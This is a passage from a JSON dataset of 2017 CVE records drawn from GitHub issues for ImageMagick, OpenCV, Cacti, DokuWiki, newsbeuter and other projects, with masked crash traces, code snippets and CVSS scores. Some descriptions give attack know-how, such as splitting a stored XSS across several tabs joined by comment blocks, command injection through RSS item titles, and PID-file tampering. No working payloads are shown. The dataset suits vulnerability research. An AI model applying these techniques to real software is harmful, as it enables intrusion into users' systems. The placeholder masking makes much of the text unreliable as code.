  8016. "description": "memory exhaustion in APITAG PATHTAG convert oom APITAG /dev/null NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG bytes of APITAG NUMBERTAG APITAG memory map follows NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG ffff NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b2a NUMBERTAG b2b NUMBERTAG b2c NUMBERTAG b2d NUMBERTAG b2e NUMBERTAG b2f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b3a NUMBERTAG b3b NUMBERTAG b3c NUMBERTAG b3d NUMBERTAG b3e NUMBERTAG b3f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b4a NUMBERTAG b4b NUMBERTAG b4c NUMBERTAG b4d NUMBERTAG b4e NUMBERTAG b4f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b5a NUMBERTAG b5ae NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c6a NUMBERTAG b5c6a NUMBERTAG b5c6b NUMBERTAG PATHTAG NUMBERTAG b5c6b NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e4a NUMBERTAG PATHTAG NUMBERTAG b6e4a NUMBERTAG b6e4b NUMBERTAG PATHTAG NUMBERTAG b6e4b NUMBERTAG b6e4c NUMBERTAG PATHTAG NUMBERTAG b6e4c NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ffb NUMBERTAG b6ffb NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG 
PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG aa NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG aa NUMBERTAG b NUMBERTAG ab NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG ab NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG dso NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG bfd8c NUMBERTAG bfdad NUMBERTAG stack] APITAG of process memory map. 
APITAG CHECK failed: PATHTAG \"((\"unable to mmap NUMBERTAG b NUMBERTAG f NUMBERTAG c1 ( PATHTAG NUMBERTAG b NUMBERTAG fd6a9 in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG bd NUMBERTAG b ( PATHTAG NUMBERTAG b NUMBERTAG be NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG a in __interceptor_malloc ( PATHTAG NUMBERTAG baef7a in APITAG APITAG NUMBERTAG baef7a in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG baf5e in APITAG APITAG NUMBERTAG bea NUMBERTAG in APITAG APITAG NUMBERTAG ec NUMBERTAG d8 in APITAG APITAG NUMBERTAG fc9e NUMBERTAG in APITAG APITAG NUMBERTAG d9a in APITAG APITAG NUMBERTAG ca in main APITAG NUMBERTAG b6e NUMBERTAG a NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG a ( PATHTAG ) POC URLTAG",
  8017. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  8018. "severity": "HIGH",
  8019. "baseScore": 7.5,
  8020. "impactScore": 3.6,
  8021. "exploitabilityScore": 3.9
  8022. },
  8023. {
  8024. "CVE_ID": "CVE-2017-12806",
  8025. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/660",
  8026. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/660",
  8027. "Repo_new": "imagemagick/imagemagick",
  8028. "Issue_Created_At": "2017-08-08T03:28:18Z",
  8029. "description": "memory exhaustion in format8BIM. PATHTAG convert oom format8BIM /dev/null NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG e8d NUMBERTAG bytes of APITAG NUMBERTAG APITAG memory map follows NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG a NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG a NUMBERTAG a NUMBERTAG ffff NUMBERTAG b1f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b2a NUMBERTAG b2b NUMBERTAG b2c NUMBERTAG b2d NUMBERTAG b2e NUMBERTAG b2f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b3a NUMBERTAG b3b NUMBERTAG b3c NUMBERTAG b3d NUMBERTAG b3e NUMBERTAG b3f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b4a NUMBERTAG b4b NUMBERTAG b4c NUMBERTAG b4d NUMBERTAG b4e NUMBERTAG b4f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b5a NUMBERTAG b5abb NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG PATHTAG NUMBERTAG b5c NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG b6e2b NUMBERTAG PATHTAG NUMBERTAG b6e2b NUMBERTAG b6e2c NUMBERTAG PATHTAG NUMBERTAG b6e2c NUMBERTAG b6e2d NUMBERTAG PATHTAG NUMBERTAG b6e2d NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6fdb NUMBERTAG PATHTAG NUMBERTAG b6fdb NUMBERTAG b6fdd NUMBERTAG PATHTAG NUMBERTAG b6fdd NUMBERTAG b6fde NUMBERTAG PATHTAG NUMBERTAG b6fde NUMBERTAG b6fe NUMBERTAG b6fe NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ffa NUMBERTAG PATHTAG NUMBERTAG b6ffa NUMBERTAG b6ffb NUMBERTAG PATHTAG NUMBERTAG b6ffb NUMBERTAG b6ffd NUMBERTAG b6ffd NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b 
NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG aa NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG aa NUMBERTAG b NUMBERTAG ab NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG ab NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG d NUMBERTAG dso NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG bd NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG bd NUMBERTAG b NUMBERTAG be NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG be NUMBERTAG b NUMBERTAG bf NUMBERTAG PATHTAG NUMBERTAG bfa NUMBERTAG bfa7a NUMBERTAG stack] APITAG of process memory map. 
APITAG CHECK failed: PATHTAG \"((\"unable to mmap NUMBERTAG b NUMBERTAG df4c1 ( PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG a9 in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG b NUMBERTAG e8e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b ( PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG a in __interceptor_malloc ( PATHTAG NUMBERTAG de NUMBERTAG c in format8BIM APITAG NUMBERTAG e NUMBERTAG c in APITAG APITAG NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG c NUMBERTAG a in APITAG APITAG NUMBERTAG ed NUMBERTAG c in APITAG APITAG NUMBERTAG fd NUMBERTAG in APITAG APITAG NUMBERTAG f2 in APITAG APITAG NUMBERTAG a in main APITAG NUMBERTAG b6e4ba NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG c5a ( PATHTAG ) POC URLTAG",
  8030. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  8031. "severity": "HIGH",
  8032. "baseScore": 7.5,
  8033. "impactScore": 3.6,
  8034. "exploitabilityScore": 3.9
  8035. },
  8036. {
  8037. "CVE_ID": "CVE-2017-12847",
  8038. "Issue_Url_old": "https://github.com/NagiosEnterprises/nagioscore/issues/404",
  8039. "Issue_Url_new": "https://github.com/nagiosenterprises/nagioscore/issues/404",
  8040. "Repo_new": "nagiosenterprises/nagioscore",
  8041. "Issue_Created_At": "2017-07-28T20:39:10Z",
  8042. "description": "nagios daemon should create its PID file before dropping privileges. Summary The nagios daemon should create its PID file before dropping privileges. This represents a minor security issue; additional factors are needed to make it exploitable. Description The purpose of the PID file is to hold the PID of the running daemon, so that later it can be stopped, restarted, or otherwise signalled (many daemons reload their configurations in response to a SIGHUP). To fulfill that purpose, the contents of the PID file need to be trustworthy. If the PID file is writable by a non-root user, then that user can replace its contents with the PID of a root process (here the PID file is created only after privileges have been dropped, so it is owned and writable by the unprivileged user the daemon runs as; compromising that user is enough to tamper with it). Afterwards, any attempt to signal the PID contained in the PID file will instead signal a root process chosen by the non-root user (a vulnerability). This is commonly exploitable via init scripts that are run as root and which blindly trust the contents of their PID files. If one daemon flushes its cache in response to SIGUSR2 and another daemon drops all connections in response to SIGUSR2, it is not hard to imagine a denial of service by the user of the first daemon against the second. Exploitation There is only a risk of exploitation when some other user relies on the data in the PID file. But you have to wonder, what's the point of the PID file if not to provide the PID to other people? Any situation where the PID file is used is therefore suspicious. The init script APITAG that ships with nagios itself relies on the PID file to e.g. reload the nagios configuration.",
  8043. "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
  8044. "severity": "MEDIUM",
  8045. "baseScore": 6.3,
  8046. "impactScore": 5.2,
  8047. "exploitabilityScore": 1.0
  8048. },
  8049. {
  8050. "CVE_ID": "CVE-2017-12852",
  8051. "Issue_Url_old": "https://github.com/numpy/numpy/issues/9560",
  8052. "Issue_Url_new": "https://github.com/numpy/numpy/issues/9560",
  8053. "Repo_new": "numpy/numpy",
  8054. "Issue_Created_At": "2017-08-15T03:02:02Z",
  8055. "description": "missing input validation. While testing the librosa library for speech recognition, I found a bug in the APITAG and APITAG functions, which use numpy.pad: once an empty list or ndarray is passed in, numpy.pad gets stuck in an infinite loop. Although the comment says that the function needs a rank NUMBERTAG array, it should still validate the input array (e.g. reject an empty input) to avoid this problem, since an unexpected empty input otherwise causes a hang (denial of service). Look forward to your reply!",
  8056. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  8057. "severity": "HIGH",
  8058. "baseScore": 7.5,
  8059. "impactScore": 3.6,
  8060. "exploitabilityScore": 3.9
  8061. },
  8062. {
  8063. "CVE_ID": "CVE-2017-12856",
  8064. "Issue_Url_old": "https://github.com/cooltey/C.P.Sub/issues/2",
  8065. "Issue_Url_new": "https://github.com/cooltey/c.p.sub/issues/2",
  8066. "Repo_new": "cooltey/c.p.sub",
  8067. "Issue_Created_At": "2017-05-07T02:02:06Z",
  8068. "description": "Cross-site Scripting (XSS). The parameter value is used without rigorous filtering. FILETAG Poc Payload\uff1a URLTAG Version NUMBERTAG FILETAG The keyword parameter is neither validated on input nor escaped on output, so injected script is executed in the page. FILETAG Resolution: validate/filter the input and HTML-encode or escape it on output.",
  8069. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  8070. "severity": "MEDIUM",
  8071. "baseScore": 6.1,
  8072. "impactScore": 2.7,
  8073. "exploitabilityScore": 2.8
  8074. },
  8075. {
  8076. "CVE_ID": "CVE-2017-12862",
  8077. "Issue_Url_old": "https://github.com/opencv/opencv/issues/9370",
  8078. "Issue_Url_new": "https://github.com/opencv/opencv/issues/9370",
  8079. "Repo_new": "opencv/opencv",
  8080. "Issue_Created_At": "2017-08-15T06:14:56Z",
  8081. "description": "APITAG in APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG Compiler => g++ > Detailed description APITAG trigger the heap buffer overflow APITAG version from NUMBERTAG to NUMBERTAG affected Root cause: in PATHTAG NUMBERTAG int bit_depth = CV_ELEM_SIZE1(m_type NUMBERTAG int src_pitch = (m_width m_bpp bit_depth NUMBERTAG APITAG _src(src_pitch NUMBERTAG uchar src = _src NUMBERTAG for NUMBERTAG m_width; x++ ) src[x] = APITAG m_strm NUMBERTAG In my poc, m_width is about NUMBERTAG larger than src_pitch, so the loop that writes src[x] for x up to m_width runs past the end of the \\_src buffer (a heap buffer overflow); the allocation size and the loop bound are computed from attacker-controlled header fields and need to be checked for consistency before the loop. (gdb) p src_pitch NUMBERTAG a2c3 (gdb) p m_width NUMBERTAG gdb) p m_bpp NUMBERTAG gdb) p bit_depth NUMBERTAG Steps to reproduce APITAG poc is here: URLTAG",
  8082. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8083. "severity": "HIGH",
  8084. "baseScore": 8.8,
  8085. "impactScore": 5.9,
  8086. "exploitabilityScore": 2.8
  8087. },
  8088. {
  8089. "CVE_ID": "CVE-2017-12863",
  8090. "Issue_Url_old": "https://github.com/opencv/opencv/issues/9371",
  8091. "Issue_Url_new": "https://github.com/opencv/opencv/issues/9371",
  8092. "Repo_new": "opencv/opencv",
  8093. "Issue_Created_At": "2017-08-15T06:18:34Z",
  8094. "description": "integer overflow in APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG Compiler => g++ Detailed description integer overflow in APITAG PATHTAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int' PATHTAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int' PATHTAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int' PATHTAG bool APITAG Mat& img NUMBERTAG int src_pitch = (m_width m_bpp bit_depth NUMBERTAG int nch = CV_MAT_CN(m_type); int width3 = m_width nch; Steps to reproduce APITAG poc is here: URLTAG",
  8095. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8096. "severity": "HIGH",
  8097. "baseScore": 8.8,
  8098. "impactScore": 5.9,
  8099. "exploitabilityScore": 2.8
  8100. },
  8101. {
  8102. "CVE_ID": "CVE-2017-12864",
  8103. "Issue_Url_old": "https://github.com/opencv/opencv/issues/9372",
  8104. "Issue_Url_new": "https://github.com/opencv/opencv/issues/9372",
  8105. "Repo_new": "opencv/opencv",
  8106. "Issue_Created_At": "2017-08-15T06:22:28Z",
  8107. "description": "Integer overflow in APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG Compiler => g++ Detailed description integer overflow in APITAG PATHTAG runtime error: signed integer overflow NUMBERTAG cannot be represented in type 'int' static int APITAG APITAG strm, int maxdigits NUMBERTAG do { val = val NUMBERTAG code NUMBERTAG if( ++digits >= maxdigits ) break; code = APITAG } while( isdigit(code)); Steps to reproduce APITAG poc is here: URLTAG",
  8108. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8109. "severity": "HIGH",
  8110. "baseScore": 8.8,
  8111. "impactScore": 5.9,
  8112. "exploitabilityScore": 2.8
  8113. },
  8114. {
  8115. "CVE_ID": "CVE-2017-12875",
  8116. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/659",
  8117. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/659",
  8118. "Repo_new": "imagemagick/imagemagick",
  8119. "Issue_Created_At": "2017-08-08T01:53:32Z",
  8120. "description": "cpu exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG ./magick cpu poc2 /dev/null static APITAG APITAG APITAG magick_restrict APITAG magick_restrict nexus_info, APITAG exception) { ..... switch (cache_info >type) { case APITAG case APITAG { register Quantum magick_restrict q; / Write pixels to memory. / if ((cache_info >columns == nexus_info APITAG && (extent == APITAG ((size_t) extent))) { length=extent; rows NUMBERTAG UL; } q=cache_info >pixels+offset cache_info >number_channels; for (y NUMBERTAG y APITAG number_channels nexus_info APITAG q+=cache_info >columns cache_info >number_channels; } break; } case APITAG { / Write pixels to disk. / APITAG >file_semaphore); if APITAG == APITAG { ERRORTAG cache_info >cache_filename); APITAG >file_semaphore); APITAG } if ((cache_info >columns == nexus_info APITAG && (extent APITAG offset+offset cache_info >number_channels sizeof( p),length,(const unsigned char ) p); if (count != APITAG length) break; p+=cache_info >number_channels nexus_info APITAG offset+=cache_info >columns; } ..... } poc: URLTAG",
  8121. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8122. "severity": "MEDIUM",
  8123. "baseScore": 6.5,
  8124. "impactScore": 3.6,
  8125. "exploitabilityScore": 2.8
  8126. },
  8127. {
  8128. "CVE_ID": "CVE-2017-12904",
  8129. "Issue_Url_old": "https://github.com/akrennmair/newsbeuter/issues/591",
  8130. "Issue_Url_new": "https://github.com/akrennmair/newsbeuter/issues/591",
  8131. "Repo_new": "akrennmair/newsbeuter",
  8132. "Issue_Created_At": "2017-08-17T20:48:21Z",
  8133. "description": "CVETAG ] Remote code execution. Dear users, Jeriko One discovered a vulnerability that allows a remote attacker to execute arbitrary code on your computer. An attacker can craft an RSS item whose title and/or URL contain shell metacharacters and commands (a command injection payload, not binary shellcode). When you bookmark such an item, the title and URL are handed to your shell as part of the bookmark command without escaping, and the injected commands run with your privileges. The vulnerability is triggered when APITAG is called; if you abort bookmarking before that, you're safe. Newsbeuter versions NUMBERTAG through NUMBERTAG are affected. Workaround ========== First of all, set APITAG to no (that's the default.) This gives you a chance to review inputs before executing your APITAG . Second, when bookmarking items, pay close attention to titles and URLs. I can't possibly teach you how to recognize injected shell commands in just a few paragraphs, so if unsure, just don't bookmark the thing. Resolution ========== A fix has already been pushed to our Git repository: URLTAG I managed to get in touch with maintainers in AUR, Debian, APITAG and Gentoo, so if you're running one of those, an update should arrive soon. If you're running something else, I encourage you to find out who maintains Newsbeuter for your distribution, contact them and point to the aforementioned commit. They'll know what to do. Call to security researchers ============================ If you discover a vulnerability, please disclose it to me privately at eual. EMAILTAG , preferably encrypting the message for PGP key NUMBERTAG A NUMBERTAG C8BFD NUMBERTAG APITAG has also been posted [on our mailing list URLTAG .",
  8134. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8135. "severity": "HIGH",
  8136. "baseScore": 8.8,
  8137. "impactScore": 5.9,
  8138. "exploitabilityScore": 2.8
  8139. },
  8140. {
  8141. "CVE_ID": "CVE-2017-12927",
  8142. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/907",
  8143. "Issue_Url_new": "https://github.com/cacti/cacti/issues/907",
  8144. "Repo_new": "cacti/cacti",
  8145. "Issue_Created_At": "2017-08-15T02:42:33Z",
  8146. "description": "xss in FILETAG via the method parameter. It is not a high-severity vulnerability, probably medium or low: the user-supplied value of the method parameter is echoed back unescaped in the error message. line NUMBERTAG echo __(\"FATAL: Spike Kill method '%s' is Invalid \", APITAG should change into echo __(\"FATAL: Spike Kill method '%s' is Invalid \", APITAG (i.e. HTML-escape the user-supplied value before it is output) FILETAG I should have found this at issue NUMBERTAG I'm sorry for the delay chen ruiqi codesafe team of qihoo NUMBERTAG",
  8147. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  8148. "severity": "MEDIUM",
  8149. "baseScore": 6.1,
  8150. "impactScore": 2.7,
  8151. "exploitabilityScore": 2.8
  8152. },
  8153. {
  8154. "CVE_ID": "CVE-2017-12978",
  8155. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/918",
  8156. "Issue_Url_new": "https://github.com/cacti/cacti/issues/918",
  8157. "Repo_new": "cacti/cacti",
  8158. "Issue_Created_At": "2017-08-19T10:53:44Z",
  8159. "description": "Stored XSS in APITAG Lower risk, given that the account requires access to be able to add/edit external links to store the XSS, but line NUMBERTAG of FILETAG isn't sanitizing APITAG , resulting in stored XSS. CODETAG Although the title field in external_links is a varchar NUMBERTAG we can get around that restriction by creating multiple tabs and using comment blocks to keep the XSS valid: Create the first tab with title: APITAG Create second tab with title: APITAG FILETAG",
  8160. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  8161. "severity": "MEDIUM",
  8162. "baseScore": 5.4,
  8163. "impactScore": 2.7,
  8164. "exploitabilityScore": 2.3
  8165. },
  8166. {
  8167. "CVE_ID": "CVE-2017-12979",
  8168. "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/2080",
  8169. "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/2080",
  8170. "Repo_new": "dokuwiki/dokuwiki",
  8171. "Issue_Created_At": "2017-08-16T20:59:34Z",
  8172. "description": "APITAG Stored XSS in FILETAG with code block. Bug The language name given for a code block is not validated or sanitized before the wiki content is rendered, so it can carry arbitrary HTML/JavaScript. An attacker can use the injected JavaScript to make a visiting administrator enable the phpok configuration option, escalating the stored XSS. Detail APITAG ERRORTAG APITAG APITAG",
  8173. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  8174. "severity": "MEDIUM",
  8175. "baseScore": 6.1,
  8176. "impactScore": 2.7,
  8177. "exploitabilityScore": 2.8
  8178. },
  8179. {
  8180. "CVE_ID": "CVE-2017-12980",
  8181. "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/2081",
  8182. "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/2081",
  8183. "Repo_new": "dokuwiki/dokuwiki",
  8184. "Issue_Created_At": "2017-08-16T21:12:14Z",
  8185. "description": "APITAG Stored XSS in FILETAG with APITAG feed. Bug The author tag in an APITAG feed is not properly sanitized: with the default configuration of APITAG, HTML special characters are not stripped from it, and dokuwiki uses the result directly in its output. An attacker can therefore make other users load a remote APITAG feed containing malicious JavaScript, which then performs requests with those users' permissions. Detail APITAG ERRORTAG APITAG remote RSS ERRORTAG dokuwiki document APITAG",
  8186. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  8187. "severity": "MEDIUM",
  8188. "baseScore": 6.1,
  8189. "impactScore": 2.7,
  8190. "exploitabilityScore": 2.8
  8191. },
  8192. {
  8193. "CVE_ID": "CVE-2017-12982",
  8194. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/983",
  8195. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/983",
  8196. "Repo_new": "uclouvain/openjpeg",
  8197. "Issue_Created_At": "2017-08-14T11:33:02Z",
  8198. "description": "memory allocation failure in opj_aligned_alloc_n (opj_malloc.c). on NUMBERTAG ERRORTAG Testcase: URLTAG",
  8199. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8200. "severity": "MEDIUM",
  8201. "baseScore": 5.5,
  8202. "impactScore": 3.6,
  8203. "exploitabilityScore": 1.8
  8204. },
  8205. {
  8206. "CVE_ID": "CVE-2017-12983",
  8207. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/682",
  8208. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/682",
  8209. "Repo_new": "imagemagick/imagemagick",
  8210. "Issue_Created_At": "2017-08-18T08:55:11Z",
  8211. "description": "Heap buffer overflow in APITAG zhihua. EMAILTAG .cn ERRORTAG POC URLTAG",
  8212. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8213. "severity": "HIGH",
  8214. "baseScore": 8.8,
